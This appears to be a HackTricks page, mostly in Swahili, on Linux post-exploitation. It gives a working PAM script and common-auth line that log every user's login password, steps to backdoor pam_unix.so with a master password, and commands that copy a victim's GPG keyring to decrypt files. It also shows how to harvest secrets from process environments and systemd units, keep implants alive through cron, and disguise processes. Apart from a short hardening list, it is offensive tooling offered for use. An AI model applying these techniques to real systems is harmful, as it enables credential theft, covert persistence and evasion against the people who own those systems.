Linux Post-Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Sniffing Logon Passwords with PAM

Wacha tukaconfigure module ya PAM ili kurekodi kila password ambayo kila mtumiaji anaitumia kuingia. Ikiwa haujui ni nini PAM angalia:

PAM - Pluggable Authentication Modules

Kwa maelezo zaidi angalia original post. Hii ni muhtasari tu:

Muhtasari wa Mbinu: Pluggable Authentication Modules (PAM) hutoa urahisi katika kusimamia uthibitishaji kwenye mifumo inayotegemea Unix. Zinaweza kuboresha usalama kwa kubadilisha michakato ya kuingia lakini pia zinaweza kuleta hatari ikiwa zitatumika vibaya. Muhtasari huu unaelezea mbinu ya kukamata taarifa za kuingia kutumia PAM, pamoja na mikakati ya kupunguza hatari.

Kukamata Taarifa za Kuingia:

• Script ya bash yenye jina toomanysecrets.sh imeandaliwa ili kurekodi jaribio za kuingia, ikiandika tarehe, jina la mtumiaji ($PAM_USER), password (kupitia stdin), na IP ya remote host ($PAM_RHOST) katika /var/log/toomanysecrets.log.
• Script imepewa ruhusa ya kutekelezwa na kuingizwa katika konfigurishaji ya PAM (common-auth) kwa kutumia module pam_exec.so na chaguzi za kukimbia kimya na kuonyesha token ya uthibitishaji kwa script.
• Mbinu hii inaonyesha jinsi host ya Linux iliyovamiwa inaweza kutumika kurekodi taarifa za kuingia kwa siri.

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

Backdooring PAM

For further details check the original post. Hii ni muhtasari tu:

The Pluggable Authentication Module (PAM) ni mfumo unaotumika kwenye Linux kwa ajili ya authentication ya watumiaji. Inafanya kazi kwa misingi mitatu mikuu: username, password, na service. Mafaili ya usanidi kwa kila service yako kwenye saraka ya /etc/pam.d/, ambapo shared libraries zinashughulikia authentication.

Objective: Badilisha PAM ili kuruhusu authentication ukitumia password maalum, ukiepuka password halisi ya mtumiaji. Hii inalenga hasa kwenye maktaba ya pamoja pam_unix.so inayotumika na faili common-auth, ambayo imejumuishwa na karibu huduma zote kwa ajili ya uhakiki wa password.

Steps for Modifying pam_unix.so:

1. Locate the Authentication Directive in the common-auth file:

• Mstari unaohusika na kukagua password ya mtumiaji unaitisha pam_unix.so.

2. Modify Source Code:

• Ongeza taarifa ya masharti katika faili ya source pam_unix_auth.c ambayo itampa ufikiaji ikiwa password iliyowekwa awali inatumika, vinginevyo itaendelea na mchakato wa authentication wa kawaida.

3. Recompile and Replace the modified pam_unix.so library in the appropriate directory.
4. Testing:

• Ufikiaji unatolewa kwenye huduma mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia password iliyowekwa awali, huku mchakato wa authentication wa kawaida ukiendelea kufanya kazi kama kawaida.

Tip

You can automate this process with https://github.com/zephrax/linux-pam-backdoor

Decrypting GPG loot via homedir relocation

Ikiwa unatokea kupata faili iliyosimbwa .gpg na folda ya mtumiaji ~/.gnupg (pubring, private-keys, trustdb) lakini huwezi kufungua kwa sababu ya ruhusa/locks za GnuPG homedir, nakili keyring kwenda mahali panaporejeleka (writable) kisha uitumie kama GPG home yako.

Marekebisho ya kawaida utakayoyaona bila hili: “unsafe ownership on homedir”, “failed to create temporary file”, au “decryption failed: No secret key” (kwa sababu GPG haiwezi kusoma/kuandika homedir ya awali).

Workflow:

# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/
# 2) Ensure ownership & perms are sane for gnupg
chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg
chmod 700 /dev/shm/fakehome/.gnupg
# 3) Decrypt using the relocated homedir (either flag works)
GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg

Ikiwa secret key material ipo katika private-keys-v1.d, GPG ita-unlock na ita-decrypt bila kuomba passphrase (au ita-prompt ikiwa ufunguo umeprotected).

Kukusanya credentials kutoka mazingira ya process (ikiwa ni pamoja na containers)

Unapopata code execution ndani ya service, process mara nyingi hurithi sensitive environment variables. Hizi ni fursa kubwa kwa lateral movement.

Quick wins

• Pata env ya process yako ya sasa: env or printenv
• Pata env ya process nyingine: tr '\0' '\n' </proc/<PID>/environ | sed -n '1,200p'
• Ongeza strings -z /proc/<PID>/environ ikiwa tr/sed hazipatikani
• Katika containers, angalia pia PID 1: tr '\0' '\n' </proc/1/environ

What to look for

• App secrets and admin creds (for example, Grafana sets GF_SECURITY_ADMIN_USER, GF_SECURITY_ADMIN_PASSWORD)
• API keys, DB URIs, SMTP creds, OAuth secrets
• Proxy and TLS overrides: http_proxy, https_proxy, SSL_CERT_FILE, SSL_CERT_DIR

Notes

• Orchestrations nyingi hupitisha settings nyeti kupitia env; hizi hurithishwa kwa children na zinafunuliwa kwa shell yoyote unayoanzisha ndani ya process context.
• Katika baadhi ya matukio, creds hizo zinatumika tena system-wide (mfano, same username/password inafanya kazi kwa SSH kwenye host), kuruhusu pivot rahisi.

Credentials zilizohifadhiwa na systemd katika unit files (Environment=)

Services zinazozinduliwa na systemd zinaweza kuweka credentials ndani ya unit files kama entries za Environment=. Orodhesha na chukua hizi:

# Unit files and drop-ins
ls -la /etc/systemd/system /lib/systemd/system
# Grep common patterns
sudo grep -R "^Environment=.*" /etc/systemd/system /lib/systemd/system 2>/dev/null | sed 's/\x00/\n/g'
# Example of a root-run web panel
# [Service]
# Environment="BASIC_AUTH_USER=root"
# Environment="BASIC_AUTH_PWD=<password>"
# ExecStart=/usr/bin/crontab-ui
# User=root

Vitu vya kiutendaji mara nyingi huleak nywila (kwa mfano, backup scripts zinazopiga zip -P <pwd>). Thamani hizo mara nyingi hutumika tena katika internal web UIs (Basic-Auth) au huduma nyingine.

Kuimarisha usalama

• Hamisha siri kwenye maghala maalum ya siri (systemd-ask-password, EnvironmentFile with locked perms, or external secret managers)
• Epuka kuingiza creds ndani ya unit files; badala yake tumia drop-in files zinazosomwa na root pekee na zifute kutoka version control
• Zungusha leaked passwords zilizogunduliwa wakati wa majaribio

Uendelevu unaotegemea Cron na loopback mutex

• Nakili implants kwenye njia nyingi zinazoweza kuandikwa (/tmp, /var/tmp, /dev/shm, /run/lock) na weka cron entries kama */5 * * * * /tmp/<bin> ili zichukue hatua za kuanzishwa upya hata zikifutwa sehemu nyingine.
• Lazimisha utekelezaji wa single-instance kwa kufunga port ya loopback iliyo fasta (kwa mfano, 127.0.0.1:51125 au 127.0.0.1:52225) na kutoka ikiwa bind() itashindwa; ss -lntp | grep -E '51125|52225' itaonyesha mutex listener.
• Waendeshaji wanaweza mara kwa mara kuua kwa wingi mchakato wowote ambao cmdline yake ina jina la dropper (mfano, init_stop), hivyo kutumia tena majina hayo wakati wa uchambuzi kunaweza kusababisha mgongano; chagua majina ya faili ya kipekee.

Kujifanya kwa mchakato kupitia prctl + argv overwrite

• Weka jina fupi la mchakato kwa kutumia prctl(PR_SET_NAME, "<label>") (kikomo cha 15-byte kwa comm), mara nyingi init, ili /proc/<pid>/status na GUI zinaonyesha lebo isiyoharibu.
• Funika tena buffer ya memory ya argv[0] baada ya kusoma urefu wa /proc/self/cmdline na pointer ya argv[0], ukijaza kwa NULs ili /proc/<pid>/cmdline na ps pia zinaonyesha lebo bandia.
• Kagua kwa kulinganisha Name: katika /proc/<pid>/status dhidi ya njia halisi ya executable na kutafuta loopback mutex listeners zinazoendeshwa na michakato yenye cmdlines ndogo/zirizo wazi.

Marejeleo

• 0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)
• alseambusher/crontab-ui
• 0xdf – HTB Environment (GPG homedir relocation to decrypt loot)
• GnuPG Manual – Home directory and GNUPGHOME
• Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.